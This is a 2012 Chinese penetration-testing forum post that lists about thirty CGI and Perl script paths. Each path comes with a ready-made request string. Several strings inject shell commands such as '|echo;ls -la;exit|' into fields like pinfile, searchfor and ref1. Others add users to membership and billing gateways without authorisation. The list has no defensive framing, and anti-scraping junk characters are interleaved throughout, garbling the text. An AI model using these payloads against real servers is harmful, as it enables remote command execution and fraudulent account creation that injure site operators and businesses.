中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
2 I2 Y D5 u5 K5 |" L* F
9 M4 P5 u% ~" j( s7 u% s
/smspass.pl
/ j& w0 o/ ?2 C$ p" S. l0 C6 a
username=username&password=password
5 N1 R$ @ ]9 l) i: s1 Y
8 B1 h) {: F3 M, j
/index.cgi
4 r% {0 q T R4 g/ R
wei=ren&gen=command
& q( u0 d2 I" e) k2 y
' I% x, }/ P! x$ }# Z
/passmaster.cgi
/ D* O# {6 A% K6 K: K1 V' ~
Action=Add&Username=Username&Password=Password
! ], ]: I& A) X$ f+ q
4 H, C' [* g( M+ K/ ^
/accountcreate.cgi
' m+ P! {* _) I6 K
username=username&password=password&ref1=|echo;ls|
- Y: {* z) R- ?% S( j5 ^2 L
( {# x+ @" G: e
/form.cgi
$ I* Y7 V9 q2 m u r( c
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
+ ]. t0 h" D- e0 @# }( A5 y3 x
5 x1 }, W: f; T* \
/addusr.pl
3 j: K; i1 e8 T3 ?4 w/ j2 ?
/cgi-bin/EuroDebit/addusr.pl
! C1 i/ Z1 K2 e0 R# x/ ^
user=username&pass=Password&confirm=Password
. t# s) B9 i% v' ]( r1 l6 `
' h: n2 D G Q, C( {5 d
/ccbill-local.asp
6 v6 [5 f3 f9 {- \0 C: c
post_values=username:password
# L4 ]/ j0 y: [3 r" a+ Q: H" _
& f7 v$ Z3 Z- V) j
/count.cgi
& P! Y% L1 G* E8 N, l9 h; }
pinfile=|echo;ls -la;exit|
6 M2 s' t" q0 o% Q
5 A6 C, M$ C( ^7 O5 L% }/ a' t
/recon.cgi
# k" a) s, E+ w" T$ K9 ?
/recon.cgi?search
# I- ]: _& {7 C e7 J8 \
searchoption=1&searchfor=|echo;ls -al;exit|
6 U2 \2 [' g# o. g6 j5 m; ]7 b. S3 Z4 Z
% C, F. D7 Z, }, O
/verotelrum.pl
+ z% _ @8 ~% t' m
vercode=username:password:dseegsow:add:amount<&30>
! _3 m1 Q, K0 w7 s3 b c2 ?/ e' ?( ]
e9 n6 L7 I6 ~+ s% U1 B5 v
/af.cgi
- w8 U4 I) H, O1 x1 K. W- Y. Z% x
_browser_out=|echo;ls -la;exit;|
/ m( O. ]; T3 n% [
& C o8 ~, q% x0 j0 P- U9 O) S
/modify.cgi
$ u2 S( o7 @/ h: P
username=username&password=password&expire=30
5 V3 n( {: V8 G
5 D: Y" H& P" y# E: ^( D
/openjournal.cgi
3 k& y% D% H& p7 O, s1 h+ J
edit=1&ct=2&go=|echo;ls -al;exit|
3 b" \/ C/ t9 P1 K: | [
$ f: D9 j$ H! p5 J$ D5 p& { L) ~' l. h& a
/gx9passwd.cgi
' I3 m& a( L4 O7 O
cmd=ADD&user=username&pass=password
1 d: I4 b2 Z# [; z Q8 U4 P
B( f; g6 y$ C9 [) p, O) w
/probecontrol.cgi
& e' p: \; X h4 C4 N
command=enable&username=username&password=password
" v( J/ u( E+ c) @
5 m' W! d8 Q# P( O- t9 J* ^
/recon.cgi
* [) f: f. h( ~0 f. N$ i
searchoption=3&searchfor=echo;ls -la;exit
9 E1 g9 h( D, q- `$ K
8 |% f7 y4 ?. F; E M! _* M
/htadd.pl
! A3 U1 T) P8 N, v; h5 u) Y
configfile=|echo; ls -alt; exit
. }& c. R& M0 V8 g( Z
% x7 Y- |3 t' D# ~
/gx9passwd.cgi
) ]) k9 o+ [3 P
cmd=ADD&user=username&pass=password
6 l$ R" S7 f& E/ k# q9 i
1 @6 S8 ?, t( {' M
/ibill*.pl
( L! M) R* r1 y
reqtype=add&authpwd=authpwd&username=username&password=password
; r# t0 J" [, f1 U( F
- S" e' w" S- V# B8 s
/cpay.cgi
4 P2 v! C8 ^: N2 y% Z, f& J" B/ _
command=add_member&username=username(EMAIL)&password=password(DES)
$ Q H, t7 o% T5 {$ W' Q! Q9 D. \1 W
( y6 B$ `+ s5 m7 e5 f2 ?
/globill_ut.cgi
/ Y2 s: i3 {( S/ Y- j* }
do=add&username=username&password=password&wpassword=password
F$ T; u9 x- U/ b0 @4 [
5 k: P q! ~' S; O' P' Y
/usercontrol.cgi
! }; p6 R3 g" u( s
command=enable&username=USER&password=PASS
4 b2 ?# ]& s0 ^/ l }; N& N
) p' G1 d$ z/ ?1 {+ D+ _
/globoSALErum.cgi
* i: S: N+ B- } ]
action=ADD&seccode=seccode&login=username&password=password
t, ?0 V' L) B$ p8 O2 T7 t [
) o) ?% r- ?& i) o1 \( q( x1 ]* G7 l
/addusr.pl
5 x+ A/ B: j% H# ^* `
user=USER&pass=PASS&confirm=PASS
/ K2 B$ L7 s% D4 E9 j
4 M* e/ g W( G9 V' A& V2 f# [
/pincount.cgi
. e# c, m( J+ U8 m
/cgi-bin/mastergate/pincount.cgi
% B3 `" Z5 ]1 j M. ?
pinfile=|echo;pwd;exit|
5 A& X d) J {: j5 Z( J5 a3 ~* ~
0 F8 U: S9 B4 M; U; j; q5 C: o
/accountcreate.cgi
7 N0 L( O& q7 X X! y1 [
/cgi-bin/gateway/accountcreate.cgi
) f, M4 R; v4 A, x- Y( M( ^' [% D8 Z
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
6 O# Y: r& ^3 u: o( e
% Q. a; r% \1 g
/af.cgi
9 _. z! x8 `5 a
/env.cgi
% f* O* d2 W; @0 m$ x
ADD+;echo;pwd;exit
2 s1 s9 b3 D9 j5 d* _" h0 F
& Y0 ]$ z U U. \6 c
/count.cgi
|3 ]; b4 \1 K( x
pinfile=|echo;pwd;exit|
# C; h& z% |7 `( y& g- R% R
0 P$ F. H' S: ~% z* i, l4 Y
/recon.cgi
S. V+ T) b6 A
searchoption=1&searchfor=|echo;ls%20-al;exit|
- |2 w3 o) |7 M' h: Q. Q
8 d" {4 | \2 D2 D2 n3 u* l H9 U
/add.cgi
$ m, y" L/ N# b( r
username=username&password=password&expire=30
2 Z* P/ l! E1 G
# M, i$ I' [* R
==============================
P1 m: f; A, _2 @0 u
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2